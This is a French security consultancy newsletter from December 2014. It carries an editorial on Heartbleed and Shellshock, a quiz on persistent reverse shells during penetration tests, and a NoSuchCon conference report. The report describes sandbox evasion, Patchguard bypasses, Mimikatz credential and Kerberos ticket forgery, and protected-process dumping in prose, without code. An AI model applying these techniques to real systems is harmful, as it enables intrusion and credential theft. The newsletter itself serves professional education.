[Newsletter HSC] N°124 - Décembre 2014

Newsletter d'information de HSC newsletter at hsc-news.com
Mer 10 Déc 14:47:08 CET 2014


========================================================================
              HSC Newsletter  --  N°124 --  décembre 2014
========================================================================



             « Patience et longueur de temps
               Font plus que force ni que rage »

                                        [ Jean de La Fontaine ]





--[ Sommaire ]----------------------------------------------------------

      1. Éditorial - Les failles 2014
      2. Le saviez-vous ? La question
      3. HSC a déménagé à Neuilly-sur-Seine
      4. HSC sponsor de la matinée CNIS-Mag
      5. Compte-rendu de la conférence NSC (NoSuchCon) 2014
      6. Appel à communication : Conférence annuelle du Club 27001 2015
      7. Appel à communication : GS-DAYS 2015
      8. Appel à communication : JSSI de l'OSSIR 2015
      9. Offres d'emploi HSC : consultants débutants et séniors
     10. Agenda des interventions publiques
     11. Prochaines formations HSC
     12. Actualité des associations : Club 27001, OSSIR et Clusif
     13. Le saviez-vous ? La réponse



--[ 1. Éditorial - Christophe Renard ]------------------------------------

     2014 aura été une grande année pour les failles.

     Attention, il y a maintenant deux types de vulnérabilités : celles,
 anonymes, que vous corrigez tous les seconds mardi du mois, ou tous
 les deux ou trois jours quand "Java update" se rappelle à vous ; et celles qui
 font les news. Cette année aura été l'année de Heartbleed (CVE-2014-0160) et
 Shellshock (CVE-2014-6277).

     Ces failles ont beaucoup de points communs :
 - Elles ont un nom, voire un site, et un logo. Heartbleed[1] comme
   Shellshock ont été activement promues par leurs découvreurs et habilement
   communiquées. Cette pratique a commencé avec les failles portant sur
   SSL/TLS (CRIME, BEAST, ...) mais s'est généralisée.
   Peu de PDG interrogeront leur DSI sur les impacts de MS014-068, alors
   que depuis juillet, Microsoft a annoncé pas moins de 8 vulnérabilités
   critiques[2], et ce en excluant celles concernant Internet Explorer.
   Mais les noms de nos héroïnes auront frappé, reprises par les
   journalistes[3][4]. Chacun en a entendu parler et malheur à
   l'informaticien qui n'aura pas eu de réponse à la question fatidique :
   "Alors, sommes-nous vulnérables à Shellshock ?".
 - Affectant des logiciels libres fondamentaux, elles se retrouvent
   partout. Les tenants d'un manichéisme où le libre s'opposerait au
   propriétaire peuvent y voir la réfutation de leur thèse. Les
   composants du logiciel libre sont enracinés partout, dans les suites
   libres comme dans les systèmes propriétaires et concernent absolument
   tous les environnements [5][6][7][8].
 - Ce ne sont pas des failles d'applications, de framework web voire de
   navigateur. Ce sont des vulnérabilités "à l'ancienne", portant sur
   les couches basses de nos piles applicatives et qui sont accessibles
   par des biais multiples.
 - L'impact estimé de prime abord en a été sous-estimé. Que ce soit
   sur la faisabilité d'extraire les clés via Heartbleed, ou
   l'exposition à l'exécution via l'environnement dans Shellshock.
 - L'une comme l'autre est exploitable à cause de mauvaises pratiques
   documentées et dont les remédiations sont connues. Les applications
   appellent des programmes tiers sans contrôler leur environnement,
   les données sensibles (clés cryptographiques) sont stockées sans
   protection en mémoire.
 - En 2014, tout serveur est donc concerné. Les "appliances réseau"
   de tout genre, mais aussi votre téléphone portable, votre
   télévision, les myriades de gadgets promettant "l'internet des
   objets", tous sont concernés [9]10][11]. Pour citer Mikko Hyponnen
   lors du récent TED Bruxelles "smart means it can be exploited"[12].
   On ajouterait utilement "smart means it shall be updated". Les
   tests retrouvent ces failles dans les appareils et les protocoles
   les plus exotiques et souvent de ceux que personne ne mettra à jour.

     Au final, 2014 sera peut-être l'année où le grand public aura
 découvert ce qu'est une vulnérabilité. Il sera d'un grand intérêt de
 suivre ce qu'il en découle.
 Il y a lieu d'espérer que les consommateurs privés comme professionnels
 se mettent à demander des comptes à leurs fournisseurs sur la défense
 en profondeur et la gestion des mises à jour. Et ce non pas grâce aux
 efforts de la communauté de la sécurité informatique en termes de
 sensibilisation, mais parce que la promotion des vulnérabilités se
 médiatise.

     Pour 2015 que souhaiter ? "Shellshock 2" le film sur grand écran bien sûr.

 [1] http://heartbleed.com/
 [2] MS014-068, MS014-066, MS014-067, MS014-064, MS014-051, MS014-058, MS014-043, MS014-038
 [2] http://www.lemonde.fr/technologies/article/2014/04/11/faille-heartbleed-les-sites-pour-lesquels-il-est-conseille-de-changer-son-mot-de-passe_4399564_651865.html
 [3] http://www.lemonde.fr/pixels/article/2014/10/02/shellshock-la-faille-de-securite-majeure-decouverte-presque-par-hasard-par-un-francais_4498904_4408996.html
 [4] http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648
 [5] http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
 [6] http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html
 [7] http://h20565.www2.hp.com/hpsc/doc/public/display?calledBy=&docId=emr_na-c04462737-1&docLocale=
 [9] http://www.wired.com/2014/04/heartbleed_embedded/
 [10] http://www.washingtonpost.com/blogs/the-switch/wp/2014/09/25/why-shellshock-is-bad-news-for-the-internet-of-things/
 [11] BusyBox couremment utilisé en remplacement de bash dans l'embarqué est
      aussi vulnérable :
      http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/
 [12] The Internet is on Fire M. Hypponen, TEDxBrussels http://youtu.be/QKe-aO44R7k



--[ 2. Le saviez-vous ? La question ]-----------------------------------

     En test d'intrusion il arrive souvent que la connexion ne soit pas stable
 rendant les shell obtenus ('bind' ou 'reverse') inutilisables lorsque la
 commande met trop de temps à s'exécuter.

 Le problème est principalement dû au fait que les commandes habituelles pour
 créer ces shells (nc, socat, etc.) coupent le shell lorsque la connexion est
 coupée. Ainsi, une commande mettant beaucoup de temps à s'exécuter (telle que
 find) ou une commande interactive (telle qu'une connexion MySQL) pourra être
 arrêtée au milieu sans permettre d'obtenir la sortie complète.

 Savez-vous comment mettre en place une solution qui permette d'obtenir un
 shell persistant même si des déconnexions réseaux surviennent ?

 Le shell doit ainsi envoyer les commandes qui ne sont pas terminées lorsque la
 connexion est rétablie et permettre de continuer à interagir après
 reconnexion.

     Réponse au paragraphe 13.



--[ 3. HSC a déménagé à Neuilly-sur-Seine ]-----------------------------

     Afin de vous accueillir dans un cadre prestigieux à la hauteur de
 vos attentes et assurer son développement, HSC a déménagé de Levallois-Perret
 à Neuilly-sur-Seine. Notre nouvelle adresse, aussi bien postale que pour
 l'accueil de nos invités, est :

     HSC (Hervé Schauer Consultants)
     185, avenue Charles de Gaulle
     F-92200 Neuilly-sur-Seine

 Pour nos stagiaires, sauf indication contraire sur leur convocation, notre
 nouveau centre de formation ultra-moderne est juste à côté :

     HSC (Hervé Schauer Consultants)
     191, avenue Charles de Gaulle
     F-92200 Neuilly-sur-Seine

 Les stagiaires se rendent directement au 191 (rappel, sauf indication
 contraire sur leur convocation), qui est également notre nouveau siège social.
 Nous sommes à la station de métro Pont de Neuilly, sortie Rue de l'Église,
 escalier coté sud, mettez-vous en queue de train en venant de Paris.
 Pour ceux venant en voiture, le parking de l'Église est à proximité. Sa
 sortie  piéton est celle de l'ascenseur de l'Église, en face de nos locaux.
 En prévenant à l'avance nous pouvons réserver des places visiteurs dans
 notre parking.

     Nos numéros de téléphone devaient demeurer les mêmes, cependant, en
 attendant  la mise en place de la portabilité, voici nos numéros provisoires
 à utiliser pour joindre vos interlocuteurs habituels :

 Standard téléphonique : 01.58.37.94.49

 Service commercial prestations
     Adrien Pasquier : 01.58.37.93.37
     Jean-Jacques Cayet : 01.58.37.92.40

 Service formations
     Lynda Benchikh : 01.58.37.90.42
     François Martinelli : 01.58.37.92.98
     Juliette Yobo : 01.58.37.94.27

 Service administratif
     Marie-Laure Rémusat : 01.58.37.93.54

     Nous nous excusons pour la gêne occasionnée.



--[ 4. HSC sponsor de la matinée CNIS-Mag le 9 décembre à Paris ]---

     Venez rencontrer HSC lors de la prochaine matinée CNIS-Mag à Paris, Hôtel
 Intercontinental, sur le thème "Administration de la Sécurité, Gestion
 d'identité & Maîtrise des données".
 Lynda Benchikh ou François Martinelli pour les formations, et Adrien Pasquier
 pour les prestations, seront à votre disposition.
 Hervé Schauer introduira la matinée sur "L'administration de la sécurité"

 Programme :

  8h30 : Accueil des participants : petit-déjeuner et Networking
  9h00 : Risques d'une mauvaise administration de la sécurité,
         Hervé Schauer, Hervé Schauer Consultants
  9h20 : 2015, passer à la vitesse supérieure en SSI : Opération
         Emmental et Pawn Storm etc., recherches en interne & prédictions 2015,
         Loïc Guezo, Trend Micro
  9h40 : SOC et CERT : défis pour une meilleure surveillance, Gérôme
         Billois, Solucom
 10H00 : Sécurisez les postes partagés de votre SI, Guillaume Guerrin, Ilex
 10H20 : Table-ronde sur l'administration de la sécurité
           - François Coupez, avocat
           - Gérald Oualid, Thales
           - Eric Vautier, Clusif
           - Médéric Leborgne, Blackberry
 11H05 : Pause
 11H25 : Refonte des procédures de gestion des habilitations, Alice Milanova,
         Maif
 11H55 : Impact juridique, Olivier Itéanu et Garance Mathias
 12H15 : Tirage au sort des cadeaux

     Participation gratuite. Inscription en ligne obligatoire sur :
 http://www.cnis-mag.com/inscription-cnis-event



--[ 5. Compte-rendu de la conférence NoSuchCon 2014 ]--------------------
    par Danil Bazin, Alexis d'Ussel & Mathieu Schipman

     Les présentations sont accessibles à l'URL suivante:
 http://www.nosuchcon.org/talks/2014/


 Program Synthesis in Reverse Engineering
 ========================================
 Rolf Rolles

 Rolf Rolles, fondateur de Möbius Strip Reverse Engineering, a montré comment
 appliquer les techniques de synthèse automatique de programmes à la
 rétro-ingénierie. La synthèse automatique de programmes n'est pas simplement
 de la force brute d'instructions visant à créer une fonction ou un programme
 donné. En combinant un désassembleur, un traducteur et interpréteur IR
 (conversion de tous les effets réels d'une instruction dans un langage
 symbolique) et un solveur SMT (Satisfaisabilité Modulo Théories : détermine
 si un état partiel donné est atteignable avec la fonction créée), il devient
 possible de déterminer les instructions d'une fonction de façon
 "intelligente". Cette technique s'applique bien à la dé-obfuscation de code,
 notamment pour les obfuscateurs basés sur des règles de substitution à
 plusieurs niveaux. Durant ses recherches, Rolf s'est souvent heurté à
 l'absence ou à l'imprécision de la documentation Intel sur les effets exacts
 des instructions x86.


 Your Q is my Q - Message Queue Security
 =======================================
 Georgi Geshev

 Georgi Geshev de MWR Infosecurity a présenté les vulnérabilités communément
 rencontrées sur les implémentations MQ les plus populaires.
 Les MOM (Message Oriented Middleware) permettent l'échange de messages de
 façon asynchrone entre différentes applications sur un réseau. En séparant les
 émetteurs de messages des consommateurs, ou abonnés, ils permettent de
 découpler les applications. Les abonnements peuvent être basés sur les thèmes,
 les types ou les contenus. Différents protocoles sont utilisés pour échanger
 les messages : basés sur TCP, UDP ou HTTP, binaires ou ASCII, avec ou sans
 chiffrement et authentification.
 Les problèmes les plus courants sont les mêmes que ceux rencontrés dans la
 majorité des SI : mots de passe par défauts connus et faibles, interfaces
 d'administration accessibles (JMX, RMI, JDWP), accès anonyme aux ressources
 (queues par défaut en lecture ou écriture). Les messages étant le plus souvent
 générés par des machines, la validation des entrées utilisateurs est
 fréquemment oubliée, ce qui laisse la porte ouverte aux habituelles SQLi, XSS,
 XXE... L'attaque "LDAP wildcard interpretation", permettant sur certaines
 implémentations une attaque par force brute sans connaissance du nom
 d'utilisateur, a également été présentée.


 HomePlugAV PLC: Practical attacks and backdooring
 =================================================
 Sébastien Dudek

 Sébastien Dudek de Sogeti a présenté les techniques d'attaque des CPL
 (réseaux utilisant le courant porteur).
 Il est généralement admis que le signal envoyé par les CPL est bloqué au
 niveau des disjoncteurs et compteurs électriques. En réalité, les bobines
 d'arrêt (choke-coil) sont souvent inefficaces, et même dans certains cas
 inexistantes. Il est donc possible d'écouter le trafic d'autres appartements
 d'un immeuble, éventuellement depuis le hall ou des parties publiques.
 L'utilisation d'une même clef NMK (Network Membership Key) définit
 l'appartenance à un même réseau logique (AVLN), permettant aux machines de
 communiquer entre elles. Pour changer la NMK, une clef DAK (Direct Access Key)
 est nécessaire. Une attaque par force brute de ces clefs n'étant pas efficace,
 Sébastien Dudek a cherché une attaque plus rapide, et l'a trouvée : en effet,
 les clefs DAK des équipements munis du composant Qualcomm Atheros sont
 générées en utilisant la même fonction, ce qui abaisse la complexité de
 l'attaque à
 256^3. De plus, des connecteurs présents sur les CPL permettent un accès en
 lecture/écriture au firmware, ce qui laisse imaginer de nombreuses
 possibilités d'exploitation.


 The nitty gritty of Sandbox Evasion
 ===================================
 Rob Rachwald

 Rob Rachwald de Fireeye a listé diverses techniques utilisées par les
 logiciels malfaisants (malware) pour tromper les bacs à sable (sandbox)
 censés les détecter.
 Fireeye a étudié environ 500000 logiciels malfaisants dans le cadre de cette
 étude. La plupart de ceux-ci sont éphémères, et retombent dans l'oubli une
 fois leur sale besogne effectuée : 67% sont à "usage unique", 85% existent
 moins d'une heure.
 Quatre méthodes d'évasion se dégagent de cette étude :
  - Détection d'interactions humaines
    Il s'agit de détecter une activité humaine (clics de souris, réponse à une
    boite de dialogue) qui tendrait à démontrer l'absence de bac à sable, et
    de déclencher l'activité malveillante seulement dans ce cas.
  - Basée sur la configuration
    Cette technique utilise des indicateurs tels que les noms de volumes, la
    possibilité d'accéder ou non au réseau ou encore un déclenchement après un
    temps prédéfini ou à une date donnée pour échapper à la détection.
  - Basée sur l'environnement
    Le logiciel malfaisant ne se déclenche que si le système est suffisamment
    "réaliste" : présence de certains logiciels, de plugins du navigateur,
    de courriels... Certains utilisent d'ailleurs la messagerie pour
    télécharger leur charge utile.
  - Détection d'hyperviseur
    Ici, la charge d'attaque n'est pas délivrée si le logiciel malfaisant
    découvre la trace d'un environnement virtualisé : services spécifiques,
    pilotes de souris virtuelles, etc.


 Quantum computing in practice
 =============================
 Renaud Lifchitz

 Renaud Lifchitz d'Oppida a dressé un état des lieux des calculateurs
 quantiques et des applications possibles, notamment en cryptographie.  Dans
 l'informatique quantique, l'unité de base n'est plus le bit mais le qubit, une
 superposition de deux états. Une application est la cryptographie quantique,
 qui repose sur la transmission d'une clef symétrique "parfaite" (one-time pad)
 par une connexion optique, mécanisme déjà déployé pour des banques en Suisse,
 en Autriche, aux États-unis et au Japon.  Renaud introduit ensuite les
 différentes opérations possibles sur les qubits, ainsi que divers algorithmes
 et leurs applications sur les problèmes mathématiques qui forment la base de
 la cryptographie actuelle : factorisation de nombres entiers et logarithme
 discret. Les calculateurs quantiques peuvent aussi accélérer le cassage de
 clefs symétriques en testant simultanément plusieurs clefs.
 Dans la partie suivante, des outils de simulation de circuits quantiques
 existant pour plusieurs plateformes (dont Android) et sur le web sont
 présentés. Ils permettent de se familiariser avec la manipulation des qubits
 et les opérations de base (Pauli-X/Y/Z, CNOT, SWAP...).
 Il présente ensuite les calculateurs quantiques adiabatiques de la société
 D-wave, plutôt controversés et réservés à certains usages spécifiques, puis le
 projet "Quantum in the cloud", permettant d'utiliser gratuitement un
 ordinateur quantique de l'université de Bristol sur simple demande.
 Il conclut en spéculant sur le futur de la cryptographie, prévoyant la fin de
 la cryptographie asymétrique "classique" d'ici 10 à 25 ans.



 Understanding and defeating Windows 8.1 Kernel Patch Protections
 ================================================================
 Andrea Allievi

 Lors de l'examen de la propagation du logiciel malfaisant Uroburos,
 l'auteur de cette conférence s'est aperçu que les machines infectées
 n'utilisaient pas de système plus récent que Windows 7 64 bits. Windows 8
 n'était pas touché grâce aux nouvelles protections dont il dispose, l'auteur
 s'est donc intéressé à ces protections.
 Parmi ces protections : une nouvelle implémentation de Patchguard qui est
 censée empêcher toute altération du noyau Windows.
 L'auteur a présenté quelques attaques qui ont réussi comme:
  - l'utilisation des registres de débogage pour stocker les modifications le
    temps que patchguard effectue ses vérifications ;
  - une modification de l'ordonnanceur du noyau afin d'empêcher le
    déclenchement de patchguard ;
  - l'attachement à certaines fonctions clés du système comme KeBugCheckEx ;
  - l'attachement à la fonction de chiffrement utilisée par Patchguard.
 Il a également abordé de nouvelles attaques permettant à un attaquant de
 protéger son code malfaisant par Patchguard.


 Mimikatz
 ========
 Benjamin Delpy

 L'auteur de mimikatz a présenté les fonctionnalités qu'il a implémentées dans
 son outil :
  - récupération des mots de passe d'un domaine Windows en mémoire ;
  - création de tickets Kerberos à partir de clé en mémoire et sans mot de
    passe (Overpass-the-hash) ;
  - extraction de tickets Kerberos en mémoire ;
  - création de tickets Kerberos valables 10 ans sur tout le domaine à partir
    des clés de l'utilisateur krbtgt (Golden Tickets) ;
  - création de tickets Kerberos à partir de la clé du système ciblé (Silver
    Tickets).

 Mimikatz utilisant un pilote signé (dont la signature est périmée), il peut
 désormais retirer des notifications noyau des logiciels de sécurité
 les empêchant de fonctionner.


 Google Apps Engine security
 ===========================
 Nicolas Collignon

 Google apps engine est une plateforme permettant le déploiement d'applications
 Web hébergées par Google dans les langages python, java, php, go.
 Afin d'empêcher ses utilisateurs de détourner cette fonctionnalité et de
 rebondir sur le système, Google a déployé des mécanismes de sécurité que
 Nicolas a tenté de contourner, en particulier ceux protégeant les applications
 python.
 Avec cette plateforme, les failles Web classiques sont toujours possibles et
 de nouveaux risques existent. Les développeurs ayant besoin d'une plateforme
 de test utilisent d'autres instances de GAE. La compromission de leur poste
 suffit souvent à compromettre toutes les instances GAE de l'entreprise.
 Le lancement des applications python est effectué par une VM python ayant
 une API restreinte empêchant l'appel des fonctions de base dangereuses.
 Le système d'exploitation et le système de fichiers sont aussi restreints.
 L'auteur a donc concentré ses efforts sur l'environnement de développement et
 a réussi à sortir du bac à sable python en accédant aux fonctions dangereuses
 python avec d'autres références par exemple posix au lieu d'os.
 Ces attaques n'ont néanmoins pu être reproduites sur l'infrastructure GAE
 grâce aux mécanismes de défense en profondeur mis en place.


 Blended Web and Database Attacks on Real-time, In-Memory Platforms
 ==================================================================
 Ezequiel Gutesman

 Cette conférence présente la solution d'architecture mélangée avec
 base de données en mémoire utilisée par SAP : HANA.
 Cette architecture transforme l'architecture trois tiers utilisés
 traditionnellement par SAP en architecture client-serveur afin que
 l'utilisateur dialogue avec la base de données directement.
 En utilisant ce système, la base de données doit être durcie afin de bien
 compartimenter l'utilisateur ce qui réduit l'impact des injections SQL
 mais augmente celui des XSS qui permettent donc d'interagir avec la
 base de données avec les droits de la victime.


 USBArmory
 =========
 Andrea Barisani

 De l'idée d'un périphérique USB de sécurité à sa mise en production, Andra
 Barisani a présenté toutes les étapes nécessaires à l'élaboration d'un
 produit électronique de sécurité.
 Cette USBArmory est capable de chiffrer automatiquement les données reçues,
 d'en effectuer une analyse antivirale, d'authentifier l'hôte branché,
 de servir de routeur VPN et d'héberger un porte-monnaie Bitcoin.
 Il permet aussi de tester la sécurité USB via des outils bas-niveau.
 Ce matériel open source sera même proportionnellement plus rentable
 pour miner du Bitcoin que la plupart des mineurs vendus sur le marché.


 Fuzzing and Patch Analysis: SAGEly Advice
 =========================================
 Richard Johnson

 Richard Johnson a présenté les solutions mises en oeuvre pour obtenir une
 couverture de code optimale lors du fuzzing d'une application.
 Un solveur SMT peut être utilisé pour déterminer quelle entrée donner à un
 programme pour rentrer dans un bloc de code voulu.
 Afin d'implémenter cette technique, le solveur Microsoft SAGE peut être
 utilisé conjointement avec un 'fuzzeur' développé par l'auteur : moflow.
 Cette solution peut aussi être utilisée pour effectuer des comparaisons entre
 deux exécutables et identifier les différences entre deux fonctions en
 comparant leur exécution symbolique.


 Exploitation of a hardened MSP430 device
 ========================================
 Braden Thomas

 Braden Thomas présente une étude menée sur des cadenas avec fonction bluetooth
 renfermant des clés physiques. L'attaquant peut récupérer la carte mère
 simplement car elle n'est pas rivetée, une pince coupante suffit à trouer le
 boîtier. Travis Goodspeed avait déjà présenté deux attaques contre les MSP430:
 voltage glitching attack - parasites envoyés pendant la vérification de
 l'authentification; Bootstrap loader (BSL) timing attack - attaque du BSL
 basé sur un comptage des cycles de l'horloge, la récupération du temps doit
 être faite au bon moment. L'attaquant utilise donc un modèle identique dont
 il connaît le mot de passe afin de connaître le temps idéal. Le problème de
 cette attaque est que la vitesse de l'horloge est inconstante, l'attaque
 n'est donc pas fiable.
 L'auteur a présenté en direct l'attaque paparazzi, une technique d'extraction
 de firmware qui consiste à décaper la puce et effectuer une tentative via
 l'interface JTAG pendant un flash photo, puis une démonstration d'une attaque
 logiciel permettant de récupérer les codes d'authentification. Les codes sont
 stockés dans la RAM, l'attaque se sert d'une fonctionnalité du BSL pour aller
 lire la RAM et récupérer les codes.


 Attack on the core
 ==================
 Peter Hlavaty

 Cette conférence examine les niveaux de privilège CPL3 à CPL0.
 La nouvelle ère post-Windows 8.1 apporte des durcissements au niveau du noyau,
 ces fonctionnalités sont également valables pour les versions actuelles de
 Linux. Supervisor Mode Execution Protection (SMEP) et Kernel Address Space
 Layout Randomization (KASLR). L'exploitation noyau devient un challenge plus
 compliqué mais encore possible. L'auteur a présenté son shellcode écrit en
 C++ et annonce la publication d'un framework de shellcoding en C++.


 Cryptographic backdooring
 =========================
 Jean-Philippe Aumasson

 Jean-Philippe Aumasson a donné une vision panoramique des portes dérobées
 cryptographiques. Une porte dérobée est un moyen non documenté d'accéder à
 un système informatique ou aux données qu'il contient. Une porte dérobée
 efficace est invisible, réponds au principe NOBUS (No One But US), est
 réutilisable, non-modifiable et simple. L'auteur a présenté des exemples
 de techniques de portes dérobées cryptographiques :
  - Modification des constantes, exemple de SHA1 round constant, modification
    de 40 bits et contrôle total du contenu.
  - Coefficient de courbe elliptique. Limiter le nombre de courbes qui peuvent
    être générées par le process.
  - Éléments de structure mathématique. Exemple du Dual_EC backdoor:
    http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html
  - Piégeage de la génération de clés rendant les clés générées prédictibles
    quoique d'apparence aléatoires.
  - Camouflage de paramètres faibles. Exemple avec RSA.
 Une leçon à retenir de ces exemples est de ne pas externaliser la génération
 de clés !
 Enfin cette conférence présentait un certain nombre d'exemples
 d'implémentations de portes dérobées cryptographiques.


 Detecting BGP hijacks in 2014
 =============================
 Guillaume Valadon & Nicolas Vivet

 Cette conférence présente les travaux de l'ANSSI sur la détection d'usurpation
 d'annonces BGP. Les pré-requis de mise en oeuvre de BGP sont rappellés : il
 faut un réseau, un numéro d'AS, un préfixe IP, un routeur BGP et une
 interconnexion.
 Aprés être revenu sur les bases du fonctionnement de BGP les conférenciers ont
 définit l'usurpation BGP comme un conflit d'annonce BGP.
 Les contre-mesures exposées sont les suivantes :
  - application de filtres stricts par interconnexion
  - annonce d'une route plus spécifique
 Puis les auteurs ont présenté l'usurpation BGP hors-ligne à l'aide de l'outil
 parsifal de l'ANSSI, un parseur BGP écrit en ocaml. Remontée des entrées
 dupliquées. Utilisation de routeurs émulés en python pour gérer les différents
 AS et remontée des conflits d'annonces BGP au format JSON. Résultats trop
 nombreux (11 milliards de conflits de janvier à octobre 2012), utilisation de
 fonctions de réduction telles que la suppression d'événements provenant du
 même pays ou encore la suppression d'événements en conflits depuis plus de
 six mois.

 L'outillage développé permet la détection de détournement BGP en temps réel.
 Les bases whois et des données BGP parsées en JSON sont synchronisées en
 temps réel. Environ 50 évenements sont remontés chaque semaine.
 Le "RIPE Atlas measurements", un projet comportant un nombre important de
 sondes à travers le monde permet de lancer des traceroute depuis les AS
 victimes. Les adresses IP du traceroute sont comparées avec les AS du AS_PATH
 afin de détecter celles ajoutées par la manipulation des attaquants.


 Unreal mode: breaking protected processes
 =========================================
 Alex Ionescu

 Cette conférence présente les différents aspects des processus protégés
 sous Windows et montre une manière de contourner la protection.
 Windows utilise différents certificats pour des utilisations diverses.
 Dans les certificats x509, le "Enhanced Key Usage" (EKU) indique
 l'utilisation pour laquelle le certificat est prévu, par exemple : signature
 de code, ...
 Dans Windows 8, le système a besoin de différencier les fichiers signés
 Windows, Microsoft ou par une entité tierce. Une valeur entière désigne le
 niveau de signature. Sur Windows 8.1, le niveau de signature est étendu au
 type de processus (store, antimalware, TCB,...)
 La notion de processus protégé a été introduite avec Windows Vista. Un
 processus lancé en mode protégé ne peut pas être modifié, supprimé, débogué.
 Dans Windows 8.1 il est possible de configurer LSASS en "protected", cette
 action n'est pas réversible simplement. Une fois protégés, les images mémoire
 des crashs sont chiffrées, il est donc impossible d'y récupérer les
 authentifiants. Un contournement a été présenté en utilisant une faille dans
 le service Windows Error Reporting (WER) avec lequel il est possible
 de dumper les processus protégés en clair. La faille n'a pas été révélée
 et sera corrigée en janvier prochain. Une fois l'image memoire en clair
 récupérée, Mimikatz permet d'y rétrouver toutes les informations utiles.
 Avec Windows 10, LSASS sera dans un conteneur hyperV, il ne sera plus
 possible d'attaquer LSASS même en mode noyau.



--[ 6. Appel à communication : Conférence annuelle du Club 27001 ]-------

     Le Club 27001 (http://www.club-27001.fr/), association à but non
 lucratif, organise à Paris le mardi 24 mars 2015 sa huitième conférence
 annuelle autour des usages des normes ISO 2700X. Cette conférence se
 déroulera à Paris  à l'espace Saint-Martin dans le cadre des
 GS-DAYS (http://www.gsdays.fr).

 La conférence annuelle du Club 27001 privilégie les retours d'expérience
 dans l'utilisation des normes de la série ISO 27000, qu'il s'agisse de la
 mise en oeuvre d'une des normes, leur usage y compris sans certification,
 les difficultés rencontrées et les intérêts perçus.

     Voici les thèmes sur lesquels nous attendons des propositions, sans
 que ceux-ci soient exhaustifs :

  - Mise en oeuvre d'un SMSI
     . Retour d'expérience
     . Reprise de l'existant
     . Comment engager sa direction générale
     . Comment surmonter la peur du SMSI
  - Gestion des risques liés à la sécurité de l'information
     . Retour d'expérience de mise en oeuvre de l'ISO 27005
     . Technique d'entretien et d'implication des métiers
     . Échelles et calcul du risque
     . Interactions avec les autres gestions des risques : opérationnels,
       industriels, CHSCT, financiers, etc.
     . Intérêts de l'ISO 27005 dans les projets, les systèmes embarqués, etc.
     . Usage d'ISO27005 vs usage d'EBIOS, de Mehari ou de RiskIT
  - Versions 2013 des normes ISO27001 et ISO27002
  - Audits internes
     . Mise en place d'audits internes pour le SMSI
     . Mutualisation des audits internes ISO 27001 (avec ISO 9001, etc)
     . Utilisation de l'ISO 19011 et ISO 27006
  - Gestion des incidents liés à la sécurité
     . Retours d'expérience
     . Usage de l'ISO 27035
     . Liens avec d'autres référentiels (NIST SP800-61rev1, etc)
  - Indicateurs, métriques et tableaux de bord
     . Retours d'expérience
     . Usage de l'ISO 27004
     . Liens avec d'autres référentiels (TBSSI de l'ANSSI, NIST SP800-50, etc)
  - Liens entre ISO 27001 et d'autres normes, référentiels ou règlements :
     . Gouvernance de la SSI, de la sécurité en général, de l'IT, du management
       des risques
     . Systèmes de Management Intégrés (ISO 9001, 14001, 20000-1, etc) avec
       ISO 27001
     . Mutualisation, opposition, complémentarité, déclencheur, etc.
     . Cohabitation ISO27001 et ISO 20000-1 / ITIL (services informatiques),
       ISO 27013
     . Coordination entre la SSI (ISO 27001) et la continuité d'activité :
       ISO 22301 (SMCA), ISO 27031 et ISO 22313
     . CobiT (audit informatique, contrôle interne)
     . Utilisations d'ISO 27001 dans le cadre ou concomitamment à d'autres
       référentiels de sécurité : RGS, PCI-DSS, SoX, Bâle II/Solvency II,
       hébergeur de données de santé (agrément ASIP-Santé), ARJEL, WLA, etc.
     . Applications sectorielles de l'ISO 27001 : télécommunications,
       santé (27011, 27799, etc)
  - Certification ISO27001 et audits de SMSI
     . Retour d'expérience des accréditeurs, des organismes de certification,
       des auditeurs et des audités
     . Contrôle de l'appréciation des risques
     . Interprétations de la Déclaration d'Applicabilité
     . Mise à jour des normes d'audit et de certification (ISO 19011,
       ISO 17021, ISO 27006)

     Les propositions doivent faire part d'un retour d'expérience pratique,
 et ne doivent pas être la présentation d'une offre de service, d'un
 produit ou plus généralement d'une solution commerciale. Le comité de
 programme sera sensible à l'aspect pratique des propositions. Cependant, les
 propositions présentant une analyse ou un comparatif fondé sur des tests
 scientifiques pourraient être acceptées.

 Les présentations feront de 35 à 45 minutes et seront en français ou en
 anglais.

 Contenu des soumissions à envoyer à conference at club-27001.fr :
    - Nom de l'auteur, biographie et affiliation
    - Synopsis d'une page maximum de l'intervention avec un plan de celle-ci
    - Format libre

 Calendrier
    - 17 janvier 2015 : date limite de réception des soumissions
    - 31 janvier 2015 : notification aux auteurs et
                        publication du pré-programme
    - 28 février 2015 : publication du programme définitif
    - 10 mars 2015 : réception des présentations
    - 24 mars 2015 : conférence


 Le comité de programme est composé des membres de l'association élus au
 conseil d'administration, soit :
     - Bertrand Augé, Kleverware
     - Thomas Bousson, On'X-Edelweb
     - Claire Cossard, CNAM-TS
     - Francis Delbos, ID Nouvelles
     - Eric Doyen, Humanis
     - Emmanuel Garnier, Systalians
     - Loïc Guézo, Trendmicro
     - Thomas Lebouc, Ipanema
     - Florence Le Goff, Solucom
     - Carl Roller, Akamai
     - Hervé Schauer, HSC



--[ 7. Appel à communication : Conférence annuelle JSSI de l'OSSIR ]-----

     Participez à la JSSI 2015, événement sécurité organisé par l'OSSIR
 (Observatoire de la Sécurité des Systèmes d'Information et des Réseaux),
 qui se déroulera le mardi 10 mars 2015 de 8h30 à 17h30 à la Maison des
 Associations (MAS), 10 Rue des Terres au Curé, 75013 Paris

 Le thème central retenu pour la JSSI 2015 est :

     "Quel avenir pour la souveraineté française en SSI ?"

 La durée des interventions sera de 45 minutes (questions incluses). La
 journée de la sécurité des systèmes d'information s'articulera autour de
 conférences et de retours d'expérience autour du sujet ci-dessus.
 Seront privilégiées les propositions techniques et juridiques, issues
 d'une expérience concrète et/ou provenant de technologies innovantes.

     Dans le cadre du thème "Quel avenir pour la souveraineté française
 en SSI ?", les sujets suivants pourront entre autre être abordés :
  - Contexte réglementaire français (CNIL, RGS 2.0, LPM, Confidentiel
    Entreprise, PSTN, IGI 1300, OIV, SI Industriel...)
    et européen (Confidentiel UE...)
  - Quel label de sécurité pour les prestataires et les produits ?
    Français, européen ?
  - Solutions de sécurité françaises ou européennes
  - Sécurité chez les prestataires / hébergeurs / intégrateurs
  - Sécurité des solutions dans le Cloud
  - Portes dérobées et sécurité matérielle
  - Confiance dans les logiciels libres ou propriétaires
